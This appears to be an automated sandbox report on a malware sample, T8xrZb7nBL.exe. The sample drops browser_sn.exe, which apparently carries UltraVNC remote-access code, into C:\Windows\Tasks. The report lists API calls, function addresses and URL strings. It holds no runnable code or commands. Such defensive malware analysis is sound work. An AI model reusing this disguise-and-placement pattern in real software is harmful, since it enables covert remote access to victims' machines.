Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime, | 0_2_00403387 |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, | 0_2_00402EE6 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C5C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, | 24_2_00007FF790C5C210 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790CEA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose, | 24_2_00007FF790CEA228 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C56DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection, | 24_2_00007FF790C56DD1 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C35910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose, | 24_2_00007FF790C35910 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C5C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, | 28_2_00007FF790C5C210 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790CEA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose, | 28_2_00007FF790CEA228 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C56DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection, | 28_2_00007FF790C56DD1 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C35910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose, | 28_2_00007FF790C35910 |
Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0 |
Source: 77EC63BDA74BD0D0E0426DC8F80085060.15.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr | String found in binary or memory: http://forum.uvnc.com |
Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr | String found in binary or memory: http://java.sun.com/products/plugin/index.html#download |
Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr | String found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1 |
Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr | String found in binary or memory: http://ocsp.thawte.com0 |
Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0 |
Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0( |
Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07 |
Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000296C000.00000004.00000020.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1294187731.000000000096B000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476676478.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2541200831.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1645104841.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr | String found in binary or memory: http://www.uvnc.com |
Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr | String found in binary or memory: http://www.uvnc.comopenhttp://forum.uvnc.comnet |
Source: 2D85F72862B55C4EADD9E66E06947F3D0.15.dr | String found in binary or memory: http://x1.i.lencr.org/ |
Source: ReaderMessages.11.dr | String found in binary or memory: https://www.adobe.co |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00405721 | 0_2_00405721 |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_004139D1 | 0_2_004139D1 |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00413AAB | 0_2_00413AAB |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00413370 | 0_2_00413370 |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00413D43 | 0_2_00413D43 |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_0040AD30 | 0_2_0040AD30 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C536D0 | 24_2_00007FF790C536D0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C379E9 | 24_2_00007FF790C379E9 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790CF09F0 | 24_2_00007FF790CF09F0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C34200 | 24_2_00007FF790C34200 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C381AD | 24_2_00007FF790C381AD |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C3E1D0 | 24_2_00007FF790C3E1D0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C551B7 | 24_2_00007FF790C551B7 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C35170 | 24_2_00007FF790C35170 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C5F980 | 24_2_00007FF790C5F980 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C48980 | 24_2_00007FF790C48980 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C46930 | 24_2_00007FF790C46930 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C4A130 | 24_2_00007FF790C4A130 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C5D150 | 24_2_00007FF790C5D150 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C5AB10 | 24_2_00007FF790C5AB10 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C37B04 | 24_2_00007FF790C37B04 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C37A9A | 24_2_00007FF790C37A9A |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C37ACF | 24_2_00007FF790C37ACF |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790CA12C0 | 24_2_00007FF790CA12C0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C5C2C0 | 24_2_00007FF790C5C2C0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C40270 | 24_2_00007FF790C40270 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C32270 | 24_2_00007FF790C32270 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C58A70 | 24_2_00007FF790C58A70 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C37A5B | 24_2_00007FF790C37A5B |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C33A90 | 24_2_00007FF790C33A90 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C55A33 | 24_2_00007FF790C55A33 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C37A1C | 24_2_00007FF790C37A1C |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790CE7250 | 24_2_00007FF790CE7250 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C5623E | 24_2_00007FF790C5623E |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C37BE2 | 24_2_00007FF790C37BE2 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C493E0 | 24_2_00007FF790C493E0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C44C10 | 24_2_00007FF790C44C10 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790CEE400 | 24_2_00007FF790CEE400 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C5739B | 24_2_00007FF790C5739B |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C37BA6 | 24_2_00007FF790C37BA6 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C4B3D0 | 24_2_00007FF790C4B3D0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C56BBD | 24_2_00007FF790C56BBD |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C37B71 | 24_2_00007FF790C37B71 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C47B90 | 24_2_00007FF790C47B90 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C34390 | 24_2_00007FF790C34390 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C4BB80 | 24_2_00007FF790C4BB80 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C60330 | 24_2_00007FF790C60330 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C37B37 | 24_2_00007FF790C37B37 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C3DCF0 | 24_2_00007FF790C3DCF0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C5DCF0 | 24_2_00007FF790C5DCF0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C61CE0 | 24_2_00007FF790C61CE0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C41D10 | 24_2_00007FF790C41D10 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C654A0 | 24_2_00007FF790C654A0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C65CA0 | 24_2_00007FF790C65CA0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C52CC0 | 24_2_00007FF790C52CC0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790CF2C70 | 24_2_00007FF790CF2C70 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C63460 | 24_2_00007FF790C63460 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790CF8C90 | 24_2_00007FF790CF8C90 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C5A420 | 24_2_00007FF790C5A420 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C48E10 | 24_2_00007FF790C48E10 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C4E610 | 24_2_00007FF790C4E610 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C4C5B0 | 24_2_00007FF790C4C5B0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C31DD0 | 24_2_00007FF790C31DD0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C56DD1 | 24_2_00007FF790C56DD1 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C48590 | 24_2_00007FF790C48590 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C54D7E | 24_2_00007FF790C54D7E |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C4AD30 | 24_2_00007FF790C4AD30 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C5AE70 | 24_2_00007FF790C5AE70 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C61660 | 24_2_00007FF790C61660 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790CF068C | 24_2_00007FF790CF068C |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C34E80 | 24_2_00007FF790C34E80 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C63E20 | 24_2_00007FF790C63E20 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C51620 | 24_2_00007FF790C51620 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C52650 | 24_2_00007FF790C52650 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C80650 | 24_2_00007FF790C80650 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C3C810 | 24_2_00007FF790C3C810 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C33770 | 24_2_00007FF790C33770 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C4AF60 | 24_2_00007FF790C4AF60 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790CEDF80 | 24_2_00007FF790CEDF80 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C5E780 | 24_2_00007FF790C5E780 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C49740 | 24_2_00007FF790C49740 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C420E0 | 24_2_00007FF790C420E0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C3A910 | 24_2_00007FF790C3A910 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C41100 | 24_2_00007FF790C41100 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C470B0 | 24_2_00007FF790C470B0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C4C8D0 | 24_2_00007FF790C4C8D0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C5A870 | 24_2_00007FF790C5A870 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C4A890 | 24_2_00007FF790C4A890 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C4C090 | 24_2_00007FF790C4C090 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C31880 | 24_2_00007FF790C31880 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C379E9 | 28_2_00007FF790C379E9 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790CF09F0 | 28_2_00007FF790CF09F0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C34200 | 28_2_00007FF790C34200 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C381AD | 28_2_00007FF790C381AD |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C3E1D0 | 28_2_00007FF790C3E1D0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C551B7 | 28_2_00007FF790C551B7 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C35170 | 28_2_00007FF790C35170 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C5F980 | 28_2_00007FF790C5F980 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C48980 | 28_2_00007FF790C48980 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C46930 | 28_2_00007FF790C46930 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C4A130 | 28_2_00007FF790C4A130 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C5D150 | 28_2_00007FF790C5D150 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C5AB10 | 28_2_00007FF790C5AB10 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C37B04 | 28_2_00007FF790C37B04 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C37A9A | 28_2_00007FF790C37A9A |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C37ACF | 28_2_00007FF790C37ACF |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790CA12C0 | 28_2_00007FF790CA12C0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C5C2C0 | 28_2_00007FF790C5C2C0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C40270 | 28_2_00007FF790C40270 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C32270 | 28_2_00007FF790C32270 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C58A70 | 28_2_00007FF790C58A70 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C37A5B | 28_2_00007FF790C37A5B |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C33A90 | 28_2_00007FF790C33A90 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C55A33 | 28_2_00007FF790C55A33 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C37A1C | 28_2_00007FF790C37A1C |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790CE7250 | 28_2_00007FF790CE7250 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C5623E | 28_2_00007FF790C5623E |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C37BE2 | 28_2_00007FF790C37BE2 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C493E0 | 28_2_00007FF790C493E0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C44C10 | 28_2_00007FF790C44C10 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790CEE400 | 28_2_00007FF790CEE400 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C5739B | 28_2_00007FF790C5739B |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C37BA6 | 28_2_00007FF790C37BA6 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C4B3D0 | 28_2_00007FF790C4B3D0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C56BBD | 28_2_00007FF790C56BBD |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C37B71 | 28_2_00007FF790C37B71 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C47B90 | 28_2_00007FF790C47B90 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C34390 | 28_2_00007FF790C34390 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C4BB80 | 28_2_00007FF790C4BB80 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C60330 | 28_2_00007FF790C60330 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C37B37 | 28_2_00007FF790C37B37 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C3DCF0 | 28_2_00007FF790C3DCF0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C5DCF0 | 28_2_00007FF790C5DCF0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C61CE0 | 28_2_00007FF790C61CE0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C41D10 | 28_2_00007FF790C41D10 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C654A0 | 28_2_00007FF790C654A0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C65CA0 | 28_2_00007FF790C65CA0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790CF2C70 | 28_2_00007FF790CF2C70 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C63460 | 28_2_00007FF790C63460 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790CF8C90 | 28_2_00007FF790CF8C90 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C5A420 | 28_2_00007FF790C5A420 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C52DF3 | 28_2_00007FF790C52DF3 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C48E10 | 28_2_00007FF790C48E10 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C4E610 | 28_2_00007FF790C4E610 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C4C5B0 | 28_2_00007FF790C4C5B0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C31DD0 | 28_2_00007FF790C31DD0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C56DD1 | 28_2_00007FF790C56DD1 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C48590 | 28_2_00007FF790C48590 |
